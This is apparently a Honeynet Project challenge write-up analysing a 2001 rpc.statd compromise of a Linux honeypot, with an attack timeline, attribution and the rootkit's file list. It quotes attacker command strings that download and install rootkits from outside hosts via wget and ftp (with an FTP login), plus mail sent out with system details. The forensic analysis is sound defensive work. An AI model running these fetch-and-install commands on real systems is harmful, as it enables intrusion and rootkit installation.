Synopsis:

On March 15, 2001 a Honeynet Project system running Redhat Linux 6.2 was compromised using a well-known vulnerability in rpc.statd. The attack was executed from a system (211.185.125.124) owned by the Kyongsan Purim Elementary School (KPES) located in Kyongbuk state, South Korea. However, the intruders appear to be of Romanian nationality. It is likely that the attackers compromised the system belonging to the KPES and used it as a "jump point" to attack the honeynet system.

Virtually all aspects of the attack were automated. The intruder's automation tools were all derivatives of tools widely available on the Internet.

Systems:

Victim Attacker
Hostname: asdf1
OS: Probably Redhat Linux 6.2
IP: 172.16.1.108
IP: 211.185.125.124

OS: Redhat Linux 6.2 (2.2.14-5.0)
IP allocated to the Kyongsan Purim Elementary School (KPES) in South Korea.
Hardware: Intel Pentium 200 MMX
Disk: approximately 4 GB of mounted storage

Chain of events:

03/15/2001 20:21:23

The KPES machine begins performing port 111 scans of the IP range 172.16.1.101 - 172.16.1.108. The only devices found to be running the portmapper are 172.16.1.103 and 192.16.1.108.

03/15/2001 20:21:24

The KPES machine sends a rpc query to 176.16.1.103 to obtain the port number for rpc.statd. The victim machine responds with rpc.statd is on port 32773.

03/15/2001 20:21:24

The KPES machine attempts the rpc.statd buffer overflow attack against 176.16.1.103. The attack fails, 176.16.1.103 which is running Solaris 7 does not appear to be vulnerable to this particular exploit (NOTE: If the .103 machines is SPARC architecture it is definitely not vulnerable to this exploit as the shellcode has been written for the x86 platform). The attacking machine discontinues its attempt to compromise the system using the rpc.statd attack.

03/15/2001 20:21:24

The KPES machine sends a rpc query to 176.16.1.108 to obtain the port number for rpc.statd. The victim machine responds with rpc.statd is on port 931.

03/15/2001 20:21:25

The KPES machine attempts the rpc.statd buffer overflow attack against 176.16.1.108. The attack is successful and binds a shell to port 39168.

03/15/2001 20:21:36

The KPES machine establishes a connection with 176.16.1.108 on port 39168 and executes the following sequence of commands:

1. cd /; uname -a; id;

2. ftp -v ftp.home.ro

	USER soane
	PASS i2ttgcj1d
	SYST
	TYPE I
	PORT 172,16,1,108,4,3
	RETR lk.tgz
	QUIT

3. tar -zxvf lk.tgz

4. cd last

5. ./install
03/15/2001 20:45

The KPES machine closes all open connections to 176.16.1.108.

03/15/2001 20:46:15

176.16.1.108 establishes the first of two SMTP sessions with mta-v15.mail.yahoo.com (216.136.129.14, bidi_damm@yahoo.com) and outblaze.com (209.61.188.33, last@linuxmail.org) respectively. Both sessions attempt to send a message to the attackers informing them of a successful attack and relevant system information. Only the message to the yahoo account was successfully delivered. The message to the outblaze.com account failed due to the victim machine using a non-existent domain.

220 YSmtp mta502.mail.yahoo.com ESMTP service ready
EHLO asdf1
250-mta502.mail.yahoo.com
250-8BITMIME
250-SIZE 3145728
250 PIPELINING
MAIL From: SIZE=836
250 sender  ok
RCPT To:
250 recipient  ok
DATA
354 go ahead
Received: (from root@localhost)
	by asdf1 (8.9.3/8.9.3) id TAA00952
	for bidi_damm@yahoo.com; Thu, 15 Mar 2001 19:46:05 -0600
Date: Thu, 15 Mar 2001 19:46:05 -0600
From: root 
Message-Id: <200103160146.TAA00952@asdf1>
To: bidi_damm@yahoo.com
Subject: roote

* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig :           inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
          inet addr:172.16.1.108  Bcast:172.16.1.255  Mask:255.255.255.0
* Uptime :   7:45pm  up  8:23,  0 users,  load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id	: GenuineIntel
* Cpu Model : model		: 4
model name	: Pentium MMX
* Cpu Speed: cpu MHz		: 200.457171
* Bogomips: bogomips	: 399.77
* Spatiu Liber: Filesystem            Size  Used Avail Use% Mounted on
/dev/hda8             251M   33M  205M  14% /
/dev/hda1              23M  2.4M   19M  11% /boot
/dev/hda6             1.6G  2.1M  1.5G   0% /home
/dev/hda5             1.6G  367M  1.2G  23% /usr
/dev/hda7             251M  5.3M  232M   2% /var
.
250 ok dirdel
QUIT
221 mta502.mail.yahoo.com
03/15/2001 20:46:23

176.16.1.108 establishes the second SMTP session with an outblaze.com (209.61.188.33) server:

220 spf2.us3.outblaze.com ESMTP Sendmail 8.11.2/8.11.2; Fri, 16 Mar 2001 01:46:24 GMT
EHLO asdf1
250-spf2.us3.outblaze.com Hello IDENT:root@asdf1.xxxxxxxxxxxxxxxxxx.xxx [172.16.1.108], pleased to meet you
250-ENHANCEDSTATUSCODES
250-EXPN
250-VERB
250-8BITMIME
250-SIZE 10000000
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
MAIL From: SIZE=838
501 5.1.8 ... Domain of sender address root@asdf1 does not exist
QUIT
221 2.0.0 spf2.us3.outblaze.com closing connection

Questions:

1. The attackers used the rpc.statd attack to get into the system. What modifications did they make to the break in process to both automate and make the process faster?

The attackers automated most aspects of the attack. Including the scanning for vulnerabilities, execution of the exploit, backdoor setup, rootkit transfer and installation, and system egress. The profile of the attack is similiar to the one provided by the luckroot exploitation package and xzibit rootkit from scan 13. The luckroot "auto rooter" package is comprised of 3 components: the luckgo script, luckscan-a rpc scanner, and luckstatdx rpc.statd exploit. The luckgo script is used to execute the luckscan-a rpc scanner against a block of addresses, if luckscan-a find a system with port 111 open it will run the luckstatdx exploit against the remote host. If the attack is successful a shell is bound to port 39168. The luckstatdx exploit then attempts to open a socket to port 39168 on the victim machine and pipe the following string to the shell:

cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n.

For the most part, this is identical to the commands executed on the honeynet system. The only differences were that FTP was used to transfer the rootkit to the victim machine and the rootkit had a different name and other minor customizations (directory name, IPs, etc). The complete reassembled session follows:

cd /; uname -a; id;
Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root)
ftp -v ftp.home.ro
Connected to ftp.home.ro.
220-
220-
220-                           H O M E  .  R  O
220-
220-                 This server is for HOME.RO members only.
220-                  Go to http://www.home.ro/ to register.
220-
220-                      No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41]
soane
Name (ftp.home.ro:root): 331 Password required for soane.
Password:i2ttgcj1d
230 User soane logged in.
get lk.tgz
Remote system type is UNIX.
Using binary mode to transfer files.
local: lk.tgz remote: lk.tgz
200 PORT command successful.
150 Opening BINARY mode data connection for lk.tgz (520333 bytes).
226 Transfer complete.
bye
520333 bytes received in 35.5 secs (14 Kbytes/sec)
421 Idle Timeout (240 seconds): closing control connection.
tar -zxvf lk.tgz
last/
tar: Archive contains future timestamp 2002-02-08 07:08:13
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
cd last
./install
********* Instalarea Rootkitului A Pornit La Drum *********
********* Mircea SUGI PULA ********************************
********* Multumiri La Toti Care M-Au Ajutat **************
********* Lemme Give You A Tip : **************************
********* Ignore everything, call your freedom ************
********* Scream & swear as much as you can ***************
********* Cuz anyway nobody will hear you and no one will *
********* Care about you **********************************


Are Make !
Are Gcc !
Nu Are Ssh !
* Inlocuim nestat ... alea alea * Gata...
* Dev... 

* Gata
* Facem Director...Si Mutam Alea.. 
* Copiem ssh si alea



* Adaugam In Startup:) ...
* Luam Informatiile dorite ...
* Gata ! Trimitem Mailul ...Asteapta Te Rog 
* Am trimis mailul ... stergem fisierele care nu mai trebuie .


* G A T A *

* That Was Nice Last 
2. What system/country did the badguys come in from?

The attack was executed from a system (211.185.125.124) belonging to the Kyongsan Purim Elementary School (KPES) located in Kyongbuk state, South Korea. This system appears to be a x86 based system running Redhat Linux 6.2. It is likely that the intruders compromised the KPES system using similiar techniques as those used to exploit 172.16.1.108 and used it as a "jump point" for the attack.

3. What nationality are the badguys, and how were you able to determine this?

The intruder's nationality is likely Romanian. The assumption is based on the following observations:

a. The rootkit was transferred from a Romanian FTP server, s1.home.ro (193.231.236.41) to the compromised host.

b. The rootkit installed on the compromised system has been customized to hide connection from the following 3 Romanian allocated address blocks: 192.254.34.x (logicnet.ro, ssigl.ro, sico.ro, Craiova.LogicTL.Net), 193.231.139.x (edu.ro, lgcb.ro, roedu.net), and 213.154.137.x (efesromania.pcnet.ro, fides.ro, urziceni.ro, slobozia.ro, pcnet.ro).

c. The rootkit installation script contains various comments in Romanian, the original script from the xzibit kit only contains comments in English. Therefore, it is likely that modification made to the original kit were done by native Romanian speakers.

4.What do the answers to questions #1 and #2 tell us about the tactics the badguys are using?

a. The attackers are not likely to have the ability to write their own exploits, and support tools, and are therefore mostly dependent on publically available exploits and tools.

b. The attackers tactic is to compromise as many systems as possible in as short as time as possible.

c. The attackers will use intermediate hosts as "jump points" in an efforti to obfuscate the origin of the attacks and avoid attibution.

d. The attackers will execute attacks without regard for their own operational security.

5. What did you learn from this challenge?

Retracing the attackers footstep and analyzing the automation process of the attack was interesting. Though the techniques used by the intruders are not new, it is interesting to see how techniques and tools are employed in the wild.

6.How long did this challenge take you?

Approximately 8 hours

Bonus Question:

Can you recover the blackhat's rootkit from the Snort binary log file? If so, how?

Yes, the rootkit can be retrieved by reassembling the ftp-data stream associated with the transfer of the rootkit to the compromised system. I used Ethereal to reassemble the stream and extract the rootkit from the Snort log. The rootkit contained the following files:

drwxr-xr-x 1031/users        0 2001-02-26 15:40:30 last/
-rwxr-xr-x 1031/users   611931 2002-02-08 08:08:13 last/ssh
-rw-r--r-- 1031/users        1 2001-02-26 10:29:58 last/pidfile
-rwx------ 1031/users     3713 2001-03-02 22:08:37 last/install
-rwx------ 1031/users     7165 2001-02-26 10:22:50 last/linsniffer
-rwxr-xr-x 1031/users     1345 1999-09-09 11:57:11 last/cleaner
-rw-r--r-- 1031/users     3278 2001-01-27 10:11:32 last/inetd.conf
-rwxr-xr-x 1031/users       79 2001-02-26 10:28:40 last/lsattr
-rw-r--r-- 1031/users    11407 2001-01-27 10:11:44 last/services
-rwxr-xr-x 1031/users     4060 2001-02-26 10:22:55 last/sense
-rw-r--r-- 1031/users      880 2000-10-22 15:29:44 last/ssh_config
-rw------- 1031/users      540 2000-10-22 15:29:44 last/ssh_host_key
-rw-r--r-- 1031/users      344 2000-10-22 15:29:44 last/ssh_host_key.pub
-rw------- 1031/users      512 2000-10-22 15:29:44 last/ssh_random_seed
-rw-r--r-- 1031/users      688 2001-02-26 10:29:51 last/sshd_config
-rwx------ 1031/users     8268 2001-02-26 10:22:59 last/sl2
-rwxr-xr-x 1031/users     4620 2001-02-26 10:23:10 last/last.cgi
-rwxr-xr-x 1031/users    33280 2001-02-26 10:23:33 last/ps
-rwxr-xr-x 1031/users    35300 2001-02-26 10:23:42 last/netstat
-rwxr-xr-x 1031/users    19840 2001-02-26 10:23:47 last/ifconfig
-rwxr-xr-x 1031/users    53588 2001-02-26 10:23:55 last/top
-rwx------ 1031/users       75 2001-02-26 10:24:03 last/logclear
-rw-r--r-- root/root       708 2001-03-02 22:05:12 last/s
-rwxr-xr-x 1031/users   632066 2001-02-26 09:46:04 last/mkxfs
I would like to thank the Honeynet Project for providing this exercise. It was alot of fun.

Regards,
Jack Hayes